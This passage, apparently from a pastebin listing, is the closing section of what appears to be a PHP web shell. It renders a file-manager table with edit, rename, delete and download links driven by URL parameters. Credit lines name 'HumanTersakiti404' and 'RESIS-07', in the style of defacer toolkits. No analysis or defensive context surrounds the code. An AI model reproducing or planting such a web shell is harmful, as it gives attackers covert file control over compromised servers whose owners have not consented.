  2949. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  2950. echo "<td class='td_home'><center>$ftype</center></td>";
  2951. echo "<td class='td_home'><center>$size</center></td>";
  2952. echo "<td class='td_home'><center>$ftime</center></td>";
  2953. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  2954. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  2955. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  2956. echo "</tr>";
  2957. }
  2958. echo "</table>";
  2959. if(!is_readable($dir)) {
  2960. //
  2961. } else {
  2962. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2963. echo "<center><font color=black>Copyright by <font color=red>HumanTersakiti404</a></center>";
  2964. echo "<center><font color=black>Recoded by <font color=red>RESIS-07</a></center>";
  2965. }
  2966. }
  2967. ?>
  2968. </html>
Add Comment
Please, Sign In to add comment